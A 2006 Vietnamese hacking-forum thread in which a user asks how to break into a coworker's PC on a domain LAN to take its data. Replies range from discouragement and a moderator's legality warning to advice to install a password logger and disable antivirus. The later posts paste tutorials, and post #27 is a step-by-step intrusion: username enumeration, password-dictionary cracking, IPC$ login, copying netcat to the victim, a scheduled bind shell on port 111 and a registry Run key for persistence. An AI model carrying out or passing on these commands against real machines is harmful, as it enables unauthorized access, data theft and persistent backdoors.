Tìm Pass và Use của XP qua mạng Lan

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận thâm nhập

Tìm Pass và Use của XP qua mạng Lan

[Discussion] Tìm Pass và Use của XP qua mạng Lan	16/07/2006 04:54:04 (+0700) \| #1 \| 7043

ngochoan2003
Member

Joined: 15/05/2003 14:09:36
Messages: 91
Offline

Chào các bác !
Em có vấn đề này cần các cao thủ trợ giúp em với, em đang dùng mạng Lan thông qua một Domain và có máy server quản lý. Mục đích của em là muốn khai thác data của một máy con khác ngang quyền với em. tại hộp thoại Run em đánh như sau : \\may10\d$
và nó hỏi User và pass thì mới vào được.
Mà cái đó em không biết, vậy bác nào biết phần mềm nào có thể dò được Pass của máy đó không hoặc cách truy cập cũng được.
Mong các bác giúp đỡ em với !

[Question] Các đại cao thủ trợ giúp	17/07/2006 02:41:05 (+0700) \| #2 \| 7247

hyperboy
Member

Joined: 24/05/2005 10:24:08
Messages: 8
Offline

Mình cũng chỉ biết sơ sơ bạn thử ghi User là Administrator còn pass thì bỏ trống rồi enter thử xem! Nếu không bạn thử làm guest cũng được, có thể gõ C:\>nbtstat \\may10 để xem user rồi dùng tool crack lấy pass!

[Question] Các đại cao thủ trợ giúp	17/07/2006 05:52:47 (+0700) \| #3 \| 7294

mainhu
Member

Joined: 13/07/2006 23:11:43
Messages: 31
Offline

d$ là share mặc định, chỉ có user có quyền admin mới vào được

[Question] Các đại cao thủ trợ giúp	17/07/2006 09:35:58 (+0700) \| #4 \| 7320

sangdl
Member

Joined: 13/07/2006 14:19:56
Messages: 2
Offline

222.255.82.106 day la cai ip cua minh nhung bi hack mat tieu roi, HVA giup minh lay lai duoc khong? hoac scan xem no do ai dang dung duoc khong a?
Cam on nhieu nhieu

[Question] Các đại cao thủ trợ giúp	17/07/2006 14:35:37 (+0700) \| #5 \| 7371

changtraivirut
Member

Joined: 02/04/2004 06:53:17
Messages: 1
Offline

bạn xâm nhập như vậy khó lắm. bạn hãy dùng phần mềm Metasploit đi. Hướng dẫn cụ thể tại http://quantrimang.com/view.asp?Cat_ID=11&Cat_Sub_ID=0&news_id=14147
Chúc bạn thành công!

[Question] Các đại cao thủ trợ giúp	18/07/2006 02:29:32 (+0700) \| #6 \| 7502

hieubietlungtung
Member

Joined: 05/07/2006 21:37:00
Messages: 45
Offline

ngochoan2003 wrote:

Chào các bác !
Em có vấn đề này cần các cao thủ trợ giúp em với, em đang dùng mạng Lan thông qua một Domain và có máy server quản lý. Mục đích của em là muốn khai thác data của một máy con khác ngang quyền với em. tại hộp thoại Run em đánh như sau : \\may10\d$
và nó hỏi User và pass thì mới vào được.
Mà cái đó em không biết, vậy bác nào biết phần mềm nào có thể dò được Pass của máy đó không hoặc cách truy cập cũng được.
Mong các bác giúp đỡ em với !

Nếu mà máy yêu cầu usename và pass thì 100% máy đó không share một cái gì hết.
Sẵn đây thông báo cho các đệ biết điều đó. Khi đăng nhập vào một máy tính nếu máy hiện thông báo yêu cầu usename và pass thì hãy tìm cách khác.

[Question] Các đại cao thủ trợ giúp	26/07/2006 09:09:31 (+0700) \| #7 \| 10020

ngochoan2003
Member

Joined: 15/05/2003 14:09:36
Messages: 91
Offline

Pó tay toàn phần !!!

Chẳng nhẽ không ai biết Hack cái đơn giản như thế này sao ???

[Question] Các đại cao thủ trợ giúp	26/07/2006 09:18:43 (+0700) \| #8 \| 10104

onelook
Member

Joined: 20/10/2004 02:51:34
Messages: 41
Location: Dawn of Victory
Offline

ngochoan2003 wrote:

Pó tay toàn phần !!!

Chẳng nhẽ không ai biết Hack cái đơn giản như thế này sao ???

Đơn giản ah ?? Nếu đơn giản sao bác ko tự làm đi mà còn lên đây hỏi !
Mà bác đã làm chưa mà biết nó đơn giản ??

[Question] Các đại cao thủ trợ giúp	26/07/2006 21:00:17 (+0700) \| #9 \| 10117

lQ
Moderator

Joined: 29/03/2005 17:06:20
Messages: 494
Offline

ngochoan2003 wrote:

Chào các bác !
Em có vấn đề này cần các cao thủ trợ giúp em với, em đang dùng mạng Lan thông qua một Domain và có máy server quản lý. Mục đích của em là muốn khai thác data của một máy con khác ngang quyền với em. tại hộp thoại Run em đánh như sau : \\may10\d$
và nó hỏi User và pass thì mới vào được.
Mà cái đó em không biết, vậy bác nào biết phần mềm nào có thể dò được Pass của máy đó không hoặc cách truy cập cũng được.
Mong các bác giúp đỡ em với !

Bạn có bao giờ sd ctr nào đó dò password của 1 file nén (vd .zip) đã đc mã hoá = password chưa?? Và bạn có bao giờ thành công ko??? Cái máy tính mà bạn đang sd có lẽ phải chạy suốt cả đời nó cũng ko thể dò ra password của file nén đó nếu password đó có độ dài >= 12 ký tự. Tương tự như vậy đối với password của Windows. Nó còn rắc rối hơn ở chỗ là phải trao đổi thông tin qua mạng. Và nếu như có ai đó đã làm đc điều này thì Microsoft có lẽ đã phá sản rồi. Vậy thì quên chuyện dò password Windows đi bạn ạ.

sangdl wrote:

222.255.82.106 day la cai ip cua minh nhung bi hack mat tieu roi, HVA giup minh lay lai duoc khong? hoac scan xem no do ai dang dung duoc khong a?
Cam on nhieu nhieu

IP dạng đó theo tớ đc biết là ip sử dụng cho dịch vụ ADSL, đc ISP cung cấp mỗi khi bạn mở modem kết nối Internet. và địa chỉ IP này sẽ thay đổi mỗi khi bạn reset lại modem. Dịch vụ dial-up hồi xưa cũng có chuyện IP thay đổi tương tự như vậy. => Ko có ai hack mất IP của bạn cả. smilie

hieubietlungtung wrote:

Nếu mà máy yêu cầu usename và pass thì 100% máy đó không share một cái gì hết.
Sẵn đây thông báo cho các đệ biết điều đó. Khi đăng nhập vào một máy tính nếu máy hiện thông báo yêu cầu usename và pass thì hãy tìm cách khác.

Chuyện username và password ko hề liên quan gì đến chuyện máy của bạn có hoặc ko 1 hoặc nhiều sharing folder(s).

- Yêu cầu các bạn ko chat chit và tạo post ko liên quan đến topic. Tất cả các post dạng này sẽ bị xoá. Nếu thành viên nào tái phạm sẽ bị cảnh cáo và nếu nặng thì sẽ ko đc tham gia sinh hoạt.

- ngochoan2003 và mọi ng nhớ ko đc đặt tiêu đề của topic tối nghĩa hoặc thách thức kiểu như vậy. Xem lại /hvaonline/posts/list/137.html

[Question] Re: Các đại cao thủ trợ giúp	26/07/2006 23:08:31 (+0700) \| #10 \| 10158

babehunter
Member

Joined: 28/07/2005 02:17:30
Messages: 3
Offline

Sao chương trình Metasploit down về nhưng không sử dụng được.
Không có giao diện đồ hoạ.
Bài hướng dẫn ở quantrimang.com là hướng dẫn tìm file msfconsole.bat nhưng chương trình chỉ có file msfconsole. Như vậy thì phải làm sao hả các đại cao thủ.

[Question] Tìm Pass và Use của XP qua mạng Lan	31/07/2006 10:20:35 (+0700) \| #11 \| 11272

ngochoan2003
Member

Joined: 15/05/2003 14:09:36
Messages: 91
Offline

lQ nói thì có vẻ am hiểu máy tính ghê gớm lắm nhỉ!
Xin cho hỏi một câu là bác đã từng sử dụng chương trình ENT3 bao giờ chưa ?
Chắc là chưa biết nó là cái gì đúng không ?
Bởi vì nếu đã dùng qua nó thì chắc hằn bác không bảo là không "quên chuyện dò password Window" .
He he he !
Nếu chưa từng dùng wa chương trình đó thì bác mau Download nó về và chạy thử đi nhé, sau đó mới phát biểu là có phần mềm nào dò Pass và Use của Windows không nhé, tiện thể tiết lộ cho bác biết luôn một điều với phần mềm ENT bác có thể dò Pass không giới hạn độ dài đâu và tui đã thử một Pass có độ dài khoảng 14 ký tự mất khoảng chưa đầy 2 phút !!!.

[Question] Tìm Pass và Use của XP qua mạng Lan	31/07/2006 10:34:06 (+0700) \| #12 \| 11274

netskyvnn
Member

Joined: 22/07/2006 23:36:02
Messages: 6
Offline

ENT3 cụ thể nó viết như thế nào ạ ????

[Question] Tìm Pass và Use của XP qua mạng Lan	31/07/2006 23:31:47 (+0700) \| #13 \| 11386

lQ
Moderator

Joined: 29/03/2005 17:06:20
Messages: 494
Offline

ngochoan2003 wrote:

lQ nói thì có vẻ am hiểu máy tính ghê gớm lắm nhỉ!
Xin cho hỏi một câu là bác đã từng sử dụng chương trình ENT3 bao giờ chưa ?
Chắc là chưa biết nó là cái gì đúng không ?
Bởi vì nếu đã dùng qua nó thì chắc hằn bác không bảo là không "quên chuyện dò password Window" .
He he he !
Nếu chưa từng dùng wa chương trình đó thì bác mau Download nó về và chạy thử đi nhé, sau đó mới phát biểu là có phần mềm nào dò Pass và Use của Windows không nhé, tiện thể tiết lộ cho bác biết luôn một điều với phần mềm ENT bác có thể dò Pass không giới hạn độ dài đâu và tui đã thử một Pass có độ dài khoảng 14 ký tự mất khoảng chưa đầy 2 phút !!!.

- Vậy cuối cùng thì ngochoan2003 đã biết cách dò admin pass rồi phải ko??
- Tớ ko nói là ko có công cụ dò password của Windows.
- Đừng nói là bạn dò password của chính máy bạn smilie

) và đang sd chính tk admin của bạn.
- Đúng là tớ ko biết ctr ENT3 (chắc là Essential NetTools???). Vậy bạn hãy gửi link download ctr và tài liệu nữa thì càng tốt.

[Question] Tìm Pass và Use của XP qua mạng Lan	31/07/2006 23:39:37 (+0700) \| #14 \| 11388

hung1910
HVA Friend

Joined: 06/09/2003 01:58:57
Messages: 123
Location: somewhere
Offline

ngochoan2003 wrote:

lQ nói thì có vẻ am hiểu máy tính ghê gớm lắm nhỉ!
Xin cho hỏi một câu là bác đã từng sử dụng chương trình ENT3 bao giờ chưa ?
Chắc là chưa biết nó là cái gì đúng không ?
Bởi vì nếu đã dùng qua nó thì chắc hằn bác không bảo là không "quên chuyện dò password Window" .
He he he !
Nếu chưa từng dùng wa chương trình đó thì bác mau Download nó về và chạy thử đi nhé, sau đó mới phát biểu là có phần mềm nào dò Pass và Use của Windows không nhé, tiện thể tiết lộ cho bác biết luôn một điều với phần mềm ENT bác có thể dò Pass không giới hạn độ dài đâu và tui đã thử một Pass có độ dài khoảng 14 ký tự mất khoảng chưa đầy 2 phút !!!.

Ăn nói cho cẩn thận nha bạn, bạn chưa biết trình độ người ta thế nào mà dám ăn nói như vậy? Cảnh cáo lần 1

[Question] Tìm Pass và Use của XP qua mạng Lan	01/08/2006 00:00:41 (+0700) \| #15 \| 11400

vodnguyen
Member

Joined: 10/07/2006 16:57:30
Messages: 34
Location: 1 nơi xa ...
Offline

ngochoan2003 wrote:

lQ nói thì có vẻ am hiểu máy tính ghê gớm lắm nhỉ!
Xin cho hỏi một câu là bác đã từng sử dụng chương trình ENT3 bao giờ chưa ?
Chắc là chưa biết nó là cái gì đúng không ?
Bởi vì nếu đã dùng qua nó thì chắc hằn bác không bảo là không "quên chuyện dò password Window" .
He he he !
Nếu chưa từng dùng wa chương trình đó thì bác mau Download nó về và chạy thử đi nhé, sau đó mới phát biểu là có phần mềm nào dò Pass và Use của Windows không nhé, tiện thể tiết lộ cho bác biết luôn một điều với phần mềm ENT bác có thể dò Pass không giới hạn độ dài đâu và tui đã thử một Pass có độ dài khoảng 14 ký tự mất khoảng chưa đầy 2 phút !!!.

ENT3 là chương trình chứ không phải Tề Thiên đại thánh.

Tui xác nhận Network Essential cho phép dò pass không giới hạn, NHƯNG, nó dò kiểu gì, ông có xem thử chưa ???? Hay là cho nó dò pass của những bé gà đặt theo kiểu user = Administrator rùi pass cũng như thế (13 ký tự rùi đó, kiểu pass thế này thì tui chỉ cần 10 giây là xong.

Tui ghét loại người rùa một vài lần rồi cứ tưởng mình hay lắm.

[Question] Re: Xin link của chương trinh ENT3	01/08/2006 00:05:06 (+0700) \| #16 \| 11405

blacknight
Member

Joined: 29/07/2006 17:57:08
Messages: 16
Offline

Chào các bác. Em được nghe nói nhiều về chương trình ENT3 nhưng tìm link để down nó không thấy, nhân tiện em thấy bác "
ngochoan2003" có nói qua, em xin mấy bác link của nó và tiện thể nếu bác nao có hảo tâm thi chi dẫn cách dung cho em với. em la member moi gia nhập lên chưa biết mong các bác thông cam.

[Question] Re: Xin link của chương trinh ENT3	01/08/2006 03:27:23 (+0700) \| #17 \| 11446

lQ
Moderator

Joined: 29/03/2005 17:06:20
Messages: 494
Offline

Essentail Nettools (ENT3)
Home: http://www.tamos.com/products/nettools/
Download: http://www.tamos.com/files/ent3.zip

Ko phải là ko tìm thấy Luke ạ. Tớ tưởng là phải search ra 1 trang hack forum nào đó thì mới thấy. Ai dè đó lại là 1 proprietary software với giá $29.00 (Xem http://www.tamos.com/order/index.php?js=1). Rõ chán.

Search từ 'password' trên home page của ENT3, thấy có mỗi 1 đoạn:

Shares: Monitors and logs external connections to your computer's shared resources, lists local shares, as well as provides a quick and easy way to connect to remote resources that gives Windows 98/Me users NT user-level connectivity features. Unlike Windows NT, Windows 98/Me has no user-level connectivity after the boot: you can specify a password, but not a username. This tool allows you to set both a username and a password.

Search thêm trong Help, cũng chỉ có 4 kết quả. Trong đó phần NetAudit xem ra sát với 'tuyệt chiêu' dò password up to 14 chars. Ko biết những ng sd ctr này có để ý đến tốc độ và đoán xem cách thức audit của nó hay chưa nhỉ?

[Question] Re: Tìm Pass và Use của XP qua mạng Lan	01/08/2006 03:39:40 (+0700) \| #18 \| 11448

hs06
Member

Joined: 04/07/2006 14:16:20
Messages: 4
Offline

Tui có địa chỉ nè ai có thể tải về rồi hướng dẫn cách sử dụng cho tui nha:
http://www.trafficstatistic.com/web/network_internet/testing/sites.html smilie

[Question] Tìm Pass và Use của XP qua mạng Lan	01/08/2006 04:27:11 (+0700) \| #19 \| 11463

lQ
Moderator

Joined: 29/03/2005 17:06:20
Messages: 494
Offline

- Nếu ai cũng nghĩ soft này dò đc pass admin của máy khác thì Microsoft chắc là đã banh chành từ lâu. Thế nhưng thực tế ko phải vậy. Buồn thay cho 1 HĐH có tới 90% máy cá nhân đang sd!

- Dù cho pm đó có làm đc chuyện này đi nữa thì MS liệu có để yên cho cty đã xd nên pm này hay ko? Và chuyện này các bạn nghĩ nó có hợp pháp hay ko? Và MS có tiến hành vá lỗi hay ko??

[Question] Re: Tìm Pass và Use của XP qua mạng Lan	02/08/2006 23:58:29 (+0700) \| #20 \| 11978

com_hacker
Member

Joined: 27/06/2006 12:55:55
Messages: 34
Location: Đâu???
Offline

Việc dò được pass chẳng qua chỉ là may mắn thôi. ct nào cũng vậy nó chỉ mò mẫm như con người ta vậy thôi chỉ là thử lần lượt các chuỗi có sẵn trong một lít nào đó. Vả lại mấy soft này thường là của nước ngoài nên mấy chuỗi đó chắc chắn là không phù hợp. Tốt nhất là thử mấy cái mặc định như Anonymous, Guest....Nếu không dc thì thực hiên phương pháp của anh IQ "Quên chuyện dò pass đi"

[Question] Tìm Pass và Use của XP qua mạng Lan	03/08/2006 01:55:14 (+0700) \| #21 \| 12019

ngochoan2003
Member

Joined: 15/05/2003 14:09:36
Messages: 91
Offline

Đương nhiên là chuyện Recover Pass của thằng XP là xương rùi nên tui mới Post bài này nên để các cao thủ thể hiện tài năng của mình, chứ còn dễ như kiểu recover pass của bọn Office thì ai mà chả làm được. Mục đích chính khi tôi Post bài này lên là làm thế nào để có thể truy cập vào một máy khác ở ngang quyền với mình trong mạng lan, và truy cập bằng mọi cách, tìm pass là một cách cổ điển nhất ngoài ra còn vô số các cách khác khau. Ví dụ như các cao thủ thì có thể truy cập vào máy của Victim thông qua lỗi tràn Stack trong dịch vụ LSA ( lsass.exe ) chẳng hạn. Đấy là ý chính mà tôi mong muốn được học hỏi ở đây, còn mấy cái chuyện bàn lùi như là bỏ ý định tìm pass hay gì gì đấy thì chán chết !
Ngay đầu đề của tip này là " Thảo luận thâm nhập" cơ mà.
Hãy đưa ra những kiến thức ý tưởng của mình, hay những tài liệu mà bạn có trong tay về thâm nhập để từ đó mình sẽ có kiến thức sâu hơn về lĩnh vực này.

[Question] Tìm Pass và Use của XP qua mạng Lan	05/08/2006 06:16:47 (+0700) \| #22 \| 12419

ngochoan2003
Member

Joined: 15/05/2003 14:09:36
Messages: 91
Offline

Sao không thấy cao thủ nào tiếp chiêu thế ?
Toàn thấy bàn chuyện cướp Domain hay hack Host mà quên mất việc làm thể nào để hack local computer sao ?
Chỉ giúp, hướng dẫn anh em với chứ !

[Question] Re: Tìm Pass và Use của XP qua mạng Lan	08/08/2006 21:07:59 (+0700) \| #23 \| 13213

evh
Member

Joined: 05/07/2005 14:51:51
Messages: 4
Offline

bạn chỉ cần command trên đường RUN BOX như sau :
\\may10\
không cần by pass
máy tính mạng lan dùng chung hầu như không bao giờ đặt pass của các máy trong LAN
còn nếu bạn muốn hack pass thì tốt nhất là đợi thằng cha ngồi máy đó logout thì dùng kĩ thuật "Đột nhập vật lý" tức là mò đến cái máy đó cài một số thứ để mà lưu giữ password và mật khẩu, loại bỏ tất cả các phần mềm diệt virus nhé, còn nếu tất cả đều không được thì tốt hơn hết là dùng mẹo,
HACKER giỏi rất ít dùng kĩ thuật tốn sức để đột nhập vào một hệ thống nào đó mà dùng cái đầu "tức là phải dùng mẹo tiếp cận đối tượng để moi thông tin, rồi mới dùng kĩ thuật để kết thúc ván đấu thôi"
Trong trường hợp của bạn thì mình ngi dùng "MỒM" là hiệu quả hơn bất kì
công cụ gì .
Bạn có biết Kevin M đã đột nhập vật lý (trèo tường) vào nhà của quản trị của SUN để tiếp cận máy chủ trước khi by pass vào server của họ đấy.
Kinh ngiem di đêm của mình cho phép mình khuyên bạn một điều là đừng bao giờ lãng phí một khả năng nào của cơ thể cả

[Question] Tìm Pass và Use của XP qua mạng Lan	09/08/2006 01:32:40 (+0700) \| #24 \| 13273

ssh
Member

Joined: 08/08/2006 13:25:52
Messages: 21
Offline

ngochoan2003 wrote:

Sao không thấy cao thủ nào tiếp chiêu thế ?
Toàn thấy bàn chuyện cướp Domain hay hack Host mà quên mất việc làm thể nào để hack local computer sao ?
Chỉ giúp, hướng dẫn anh em với chứ !

Hãy nhìn từ thực tế của bạn, việc dò pass nó chỉ là hãn hữu nếu đối phương đặt "short pass".Việc hack local phụ thuộc khá nhiều vào việc bảo mật PC của đối phương, theo tôi cho rằng, đi cửa trước không được thì nên dùng của sau và có nhiều cách để làm việc này, chắc không phải bàn thêm nữa.

[Question] Tìm Pass và Use của XP qua mạng Lan	09/08/2006 09:00:16 (+0700) \| #25 \| 13398

xikenet
Member

Joined: 13/05/2005 15:46:16
Messages: 127
Location: Hell which was made in Heaven
Offline

Noi nghe ne`, bo? cuoc di ku oi. Hack nhu vay duoc thi la su phu roi`. Hoi truoc tui co nguoi tren may do' va da lay duoc fa`n dump key cua may do' ma` giai haoi ko duoc. Hoi truoc tui cung bo post 1 bai ve hack admin password, nhung chi co the recover thoi chu kko the nao lay duoc passdau.
Con` 1 cach. Toi cai may do' bo dia~ hiren boot zo, recovery pass, roi copy ra. Cuoi cung ... chay cho that xa.

[Question] Tìm Pass và Use của XP qua mạng Lan	10/08/2006 03:11:34 (+0700) \| #26 \| 13632

ngochoan2003
Member

Joined: 15/05/2003 14:09:36
Messages: 91
Offline

Em xin Copy lại một bài viết của một thành viên trong một diễn đàn Hack, tuy rằng họ không nói nhiều như mấy bác bên này nhưng ít ra họ còn nói cho em biết chút ít, mấy bác đọc thử nhé :
" Tôi xin trình bày những bước cơ bản để bạn đột nhập một mạng LAN. Ngoài các tool thông dụng ra, nhưng không phải lúc nào bạn cũng có tool bên cạnh hoặc có thể cài đặt nó thành công được. Sau đây tôi trình bày những bước căn bản có sai xót gì các bác trao đổi thêm.
1- Kiểm tra IPC share: IPC viết tắt của Inter-Process Communication, được dùng trong việc chia sẻ dữ liệu giữa các ứng dụng và máy tính trên mạng
(NT/2K). Khi một máy được khởi động và log vào mạng, hdh sẽ tạo 1 chia sẻ ngầm định tên là IPC$. Nó sẽ giúp cho các máy khác có thể nhìn thấy và kết nối đến các chia sẻ trên máy này. Tuy nhiên, có thể vì một lý do gì đó, người dùng xóa mất IPC$ share, do đó, ta cần kiểm tra và tạo lại kết nối đến
IPC$ (gọi là null connection), nếu kết nối thành công, ta có thể thấy được cả các chia xẻ đặc biệt được ẩn (bao gồm C$, ADMIN$, IPC $, IPC$). Cụ thể, dùng 1 trong 3 lệnh sau ở command prompt:
C:\>NET USE \\TARGET\IPC$ "" /USER:""

C:\>NET USE \\TARGET\IPC$ * /USER:

C:\>NET USE \\TARGET\IPC$ * /USER:""
trong đó: target là computername hoặc IP của máy bạn muốn kết nối. Lưu ý, các chia xẻ có dấu $ phía sau tên chỉ ra rằng chia xẻ đó được ẩn và cách này chỉ áp dụng khi cổng NetBios 139 của máy bạn và máy đích được mở.
Thường là đối với chia xẻ dạng này, bạn sẽ ít có cơ hội khai thác được gì. Tuy nhiên, nếu may mắn, bạn vẫn có thể khai thác được trong trường hợp các chia xẻ đó không yêu cầu mật khẩu.
Kế đến, bạn dùng lệnh sau để xem các chia xẻ thấy được:
C:\>net view \\TARGET
Lệnh net view sẽ liệt kê danh sách các share của máy đích. Bạn dùng net view /? để biết thêm các cách dùng khác.
Sau khi tạo được null connection và biết được các share trên máy đối phương. Ðối với các share được bảo vệ bằng username/password, bạn có thể dùng các tool sau để thử crack chúng: Nat (NetBIOS Auditing Tool)...
Ðể tiết kiệm thời gian, bạn tìm và dùng thử chương trình xSharez scanner, cũng có thể cho bạn kết quả tương tự.
2- Kiểm tra các cổng mở
Một cách khác để connect vào một máy là duyệt các port mở của máy đích. Tuỳ loại port mà ta có cách thức khai thác khác nhau, đơn giản nhất là dùng telnet để connect vào máy thông qua port được mở, ví dụ:
C:\telnet phatom 69
Một số port thông dụng:
21: FTP
23: Telnet proxy server
25: SMTP
110: POP3
139: NETBIOS
1080: SOCKS proxy
6667: IRC mapping
.....
Các công cụ để scan port có rất nhiều, ví dụ như: superscan, elite, .... – Các bạn đọc có thể vào phần công cụ Learning hacking For Viet để tài về. Sau khi scan được port nào đang opened, nếu port đó ngoài những port trên, bạn thử dùng telnet để connect, nếu thành công, bạn có thể vào command prompt shell của máy đó.
3- Kiểm tra các lổ hổng của OS/Software
Cách cuối cùng tớ nói ở đây, cũng là cách khó nhất là duyệt xem máy đó đang dùng OS gì, server gì, software nào. Mỗi loại trên có các hole/vulnerability riêng, được tìm thấy và mô tả chi tiết trong các site về security như ntbugtraq, securityfocus, hoặc trong forum.
Từ những lổ hổng biết được, ta sử dụng các exploit tương ứng để thâm nhập vào máy.
Lỗi sơ đẳng nhất trong các system software là lỗi về cách đặt password, ví dụ như các máy Wins 9x có thể vào mà không cần password (tất nhiên là khi đó, người log vào sẽ bị hạn chế truy cập các tài nguyên mạng); hoặc như với NT/2K, sau khi setup, password ngầm định của adminnistrator là rỗng, nếu user không thay đổi pass cho admin, thì ta có thể connect remote được dưới username là administrator mà không cần pass.
Các lỗi còn lại thường là do các sai sót trong quá trình viết chương trình mà vô tình tạo nên những lỗ hổng, các đoạn code kiểm tra không đầy đủ, không stable...cho phép người dùng thực thi các lệnh, chạy các chương trình từ xa. Ví dụ như bug Unicode encoding của IIS4... Và cách thường dùng để nhập là tìm cách send 1 trojant/backdoor (điển hình như Netcat...) đến máy đó, chạy backdoor đó để mở 1 port nhất định nào đó, rồi ta sẽ connect remote vào port đó. "

Đấy đâu phải không có cách để đột nhập vào máy trong mạng Lan đâu >
Ngoài ra thì còn rất nhiều cách nữa đấy.

[Question] Tìm Pass và Use của XP qua mạng Lan	10/08/2006 03:16:24 (+0700) \| #27 \| 13633

ngochoan2003
Member

Joined: 15/05/2003 14:09:36
Messages: 91
Offline

Một bài viết hay nữa nè !
Hacking thông qua resource share:

Hacker có thể dùng các tool hack tự động ví dụ như : ent3,legion… ( nhưng bản chất của các công cụ này là thưc hiện các bước mà tôi sẽ nói dưới đây 1 cách tự động,chính vì vậy việc dùng các tool này là một cách khá củ chuối …)
Trước tiên Hacker sẽ kiểm tra nhưng tài nguyên được chia sẻ trên máy tính của bạn.
Chỉ bằng vài dòng lệnh đơn giản trên comand line:

CODE

[C:\>Net view \\x.x.x.x ( với x.x.x.x là địa chỉ IP của bạn mà hacker đã biết )

Shared resources at \\x.x.x.x

Share name Type Used as Comment
-------------------------------------------------------------------------------
C Disk
PRJA3 Disk
The command completed successfully.
C:\>

Với Windows 95 & 98 thì khả năng bị hack Cao hơn nhiều so với Windows NT,2000,XP ( vì win 95,98 dùng định dạng FAT&FAT32 có độ bảo mật thấp hơn nhiều so với NTFS)

Đối với hai loại Windows này (95,98) Hacker thậm chí không cần lấy Administrator cũng có thể làm được tất cả ( bạn có tin không ?).
Khuyến cáo : không nên dùng 2 loại win này vì quá lỗi thời và có thể bị hack bất cứ lúc nào.

Sau khi liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker).Hacker sẽ ánh sạ ổ đĩa ,thư mục share để truy cập vào.
Cũng bằng command line:

CODE

C:\> net use z: \\x.x.x.x \share
The command completed successfully.

Chẳng lẽ hack đơn gian vậy sao ? Không , không hề đơn giản như thế bởi vì máy của victim có đặt password ( viêc ánh sạ cần phải biết username & password ).Thế là Hacker pó tay ? không hacker không bao giờ chịu pó tay,hacker sẽ cố gắng lấy username & password
Lấy Username :

CODE

C:\> Nbtstat –A x.x.x.x

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
ADMIN <00> UNIQUE Registered
BODY <00> GROUP Registered
ADMIN f <20> UNIQUE Registered
BODY <1E> GROUP Registered
BODY <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-08-A1-5B-E3-8C

Vậy máy x.x.x.x sẽ có 2 username là : ADMIN va BODY
Khi đã có username hacker sẽ tiến hành Crack password ( dựa vào các tool như : pqwak,xIntruder) Hoặc Hacker sẽ tiến hành tạo ra một từ điển ( dựa vào khả năng phán đoán của hacker ) tên là : pass.txt

CODE

“” ADMIN
123456 ADMIN
123456 BODY
“” BODY
…

Sau đó hacker crack bang lệnh :
[/CODE]Cũng có thể tạo Userlist.txt và passlist.txt rồi dùng lệnh:

CODE

C:\> FOR /F %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt x.x.x.x.%I>>output.txt

Đối với Win 2000,XP hacker sẽ không là gì nếu không phải administrator chính vì vậy hacker bằng mọi giá sẽ lấy cho được administrator.
nếu lấy được admin thì việc còn lại thì chờ hacker định đoạt.
Khuyến cáo : không nên share gì hết ( trong trường hợp buộc phải share thì nên đặt password phức tạp 1 chút )
Giả sử rằng máy của Victim không share. Vậy hacker làm sao ?

Trong trường hợp này hacker sẽ đoán user & pass (có thể dùng cách ở trên hoặc dung các tool như: user2sid/sid2user,dumpACL,SMBGrind……) sau đó kết nối tới IPC$ ( mặc định share của windows)

CODE

C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully.

Trong trường hợp không thê đoán Đươc user & pass hacker có thể thiết lập một Null session tới máy victim:

CODE

C:\> net use \\x.x.x.x\IPC$ “” /user:””
The command completed successfully

Và rồi nếu victim permission không đúng sẽ có nhưng hậu quả khôn lường.

khuyến cáo : Vô hiệu hoá NetBios ( Bấm vào My Network Places chọn Local Area Connetion, chọn TCP/ IP sau đó bấm vào propperties chọn Advandce, chọn WINS và bấm vào Disable NetBIOS over TCP / IP), Dùng firewall chặn 1 số port không cần thiết , khoá tài khoản sau 1 số lần đăng nhập thất bại .

Tiện đây cũng nói thêm về điều khiển từ xa ( vì có nhiều bạn đột nhập được vào rùi mà không biết phải làm sao )

Giả sử rằng bạn đã có username,password của admin của máy victim rồi:
giờ thiết lập 1 phiên làm viêc:

CODE

C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully.

Sau đó ta cần copy backdoor để điều khiển máy victim có rất nhiều loại backdoor nhưng tôi thấy hơn cả vẫn là : netcat ( nc)
chép nc vào máy victim

CODE

C:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe
The command completed successfully.
1 file copies

Chạy service Schedule trên máy victim ( có service này mới thực thi đ ươc các file trên máy victim, mặc đinh khi cài win sẽ chạy service này)

CODE

C:\> sc \\x.x.x.x start schedule
service_name : schedule

Bây giờ kiểm tra giờ trên máy victim

CODE

C:\> net time \\x.x.x.x

Current time at \\10.0.0.31 is 6/29/2005 4:50 AM

The command completed successfully.

Bây giờ chạy netcat ở chế độ ẩn lắng nghe cổng 111:

CODE

C:\>AT \\x.x.x.x 4:55 /interactive “c:\windows\nc.exe” –L –d –p111 –e cmd.exe

Added a new job with job ID = 1

đợi đến 4:55 rồi chạy thử nc.exe

CODE

C:\>nc –nvv x.x.x.x 111

(UNKNOWN) [x.x.x.x] 111 (?) open
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\windows>

Bây giờ làm gì thì tuỳ nha ( nhưng đừng có phá hoại người ta nhe’)
Vấn đề là làm sao cho những lần sau victim bật máy tính lên netcat tự động chạy và lắng nghe mệnh lệnh của ta?
Bạn có thể cho netcat khởi động cùng windows. "moi" file netcat.reg (dùng notepad và save lại thành .reg) có nội dung như sau:

CODE

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe"

Sau đó copy sang máy victim và chạy nha!

Bài viết này tui copy lại Post để nọi người tham khảo, kiến thức này không phải là do tôi viết ra. ( hình như của bác ZENO thì phải cũng trong HVA của mình đấy )

[Question] Tìm Pass và Use của XP qua mạng Lan	10/08/2006 14:50:15 (+0700) \| #28 \| 13758

cuonghm
Member

Joined: 08/08/2006 22:12:59
Messages: 8
Offline

Xin có một số ý kiến:

Chung quy là phải tìm được password của một user qua các tool quét.
